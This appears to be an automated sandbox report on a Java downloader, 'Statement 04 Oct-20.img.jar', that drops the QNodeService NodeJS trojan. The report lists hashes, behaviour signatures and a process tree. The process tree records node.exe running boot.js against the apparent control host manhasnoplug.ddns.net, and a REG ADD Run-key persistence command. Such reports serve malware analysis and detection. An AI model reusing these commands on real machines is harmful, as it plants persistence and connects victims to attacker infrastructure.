Analysis
-
max time kernel
51s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 10:36
Static task
static1
Behavioral task
behavioral1
Sample
Statement 04 Oct-20.img.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Statement 04 Oct-20.img.jar
Resource
win10v20201028
General
-
Target
Statement 04 Oct-20.img.jar
-
Size
95KB
-
MD5
67dcde7d0220354ccabc329fbe056af6
-
SHA1
e22bc9ad2f1da67d9ede5ad163cdcd158df6ff36
-
SHA256
dc33943acfaeb2b98b0798c8b87d11037354deb8a324a21062f9098fb1b3922e
-
SHA512
cb3e662e7aa7015f2c5d734ee481121762a84c536f956d57bbdcaa038bab6a4a62a69d004dd1987dc0b439343f81ee494d8e6aef9a5db761373f43176b96c2ef
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 156 node.exe 2180 node.exe 3592 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\9548c053-87e3-4b53-b155-c388d3969fbe = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab96-169.dat js behavioral2/files/0x000100000001ab96-172.dat js behavioral2/files/0x000100000001ab96-176.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 156 node.exe 156 node.exe 156 node.exe 156 node.exe 2180 node.exe 2180 node.exe 2180 node.exe 2180 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe 3592 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1180 wrote to memory of 1084 1180 java.exe 77 PID 1180 wrote to memory of 1084 1180 java.exe 77 PID 1084 wrote to memory of 156 1084 javaw.exe 81 PID 1084 wrote to memory of 156 1084 javaw.exe 81 PID 156 wrote to memory of 2180 156 node.exe 83 PID 156 wrote to memory of 2180 156 node.exe 83 PID 2180 wrote to memory of 3592 2180 node.exe 84 PID 2180 wrote to memory of 3592 2180 node.exe 84 PID 3592 wrote to memory of 3868 3592 node.exe 86 PID 3592 wrote to memory of 3868 3592 node.exe 86 PID 3868 wrote to memory of 2584 3868 cmd.exe 87 PID 3868 wrote to memory of 2584 3868 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Statement 04 Oct-20.img.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2fb4f4fa.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:156 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2584
-
-
-
-
-
-